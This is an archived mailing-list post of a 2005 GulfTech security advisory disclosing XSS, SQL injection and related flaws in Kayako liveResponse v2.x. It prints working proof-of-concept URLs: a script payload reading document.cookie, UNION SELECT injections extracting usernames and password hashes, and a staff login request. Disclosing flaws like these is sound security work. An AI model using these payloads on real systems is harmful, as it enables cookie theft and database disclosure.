Ethical Hacking Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package. | Computer Forensics Training at InfoSec Institute Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors. |

| Subject: | Kayako liveResponse Multiple Vulnerabilities |
|---|---|
| Date: | Sat, 30 Jul 2005 08:03:38 -0500 |
########################################################## # GulfTech Security Research July 30th, 2005 ########################################################## # Vendor : Kayako Web Solutions # URL : http://www.kayako.com/ # Version : Kayako liveResponse v2.x # Risk : Multiple Vulnerabilities ##########################################################
Description: Kayako liveResponse is a web based application aimed at providing live support for websites and businesses. There are a number of vulnerabilities in Kayako liveResponse that range from Cross Site Request Forgeries, Cross Site Scripting, Information Disclosure, Script Injection, and SQL Injection vulnerabilities which can lead to disclosure of sensitive data. Users are suggested to update as soon as a secured version becomes available.
http://host/index.php?username="><script>alert(document.cookie)</script>
This vulnerability could be used to steal cookie based authentication credentials within the scope of the current domain, or render hostile code in a victim's browser.
http://host/index.php?date=22&month=3&year=2005%20UNION%20SELECT%200,0,0,0,0,0, username,pass%20FROM%20lrUsers%20WHERE%201/*&_g=2&_a=panel&_m=cal
http://host/index.php?date=22%20UNION%20SELECT%200,0,0,0,0,0,username,pass%20 FROM%20lrUsers%20WHERE%201/*&month=3&year=2005&_g=2&_a=panel&_m=cal
These issues can be used to read arbitrary contents of the database such as usernames and password hashes.
http://host/index.php?_a=staffsession&_m=start&login=1&username=admin&password=james
http://host/addressbook.php
Related Info: The original advisory can be found at the following location http://www.gulftech.org/?node=research&article_id=00092-07302005
Credits: James Bercegay of the GulfTech Security Research Team
| <Prev in Thread] | Current Thread | [Next in Thread> |
|---|---|---|
| ||
| Previous by Date: | RE: [Full-disclosure] Anonymous Web Attacks via DedicatedMobileServices, Alexander Klimov |
|---|---|
| Next by Date: | PC-EXPERIENCE/TOPPE CMS Security Advisory, rat |
| Previous by Thread: | [Full-disclosure] Kshout Data Disclosure, group@soulblack.com.ar |
| Next by Thread: | PC-EXPERIENCE/TOPPE CMS Security Advisory, rat |
| Indexes: | [Date] [Thread] [Top] [All Lists] |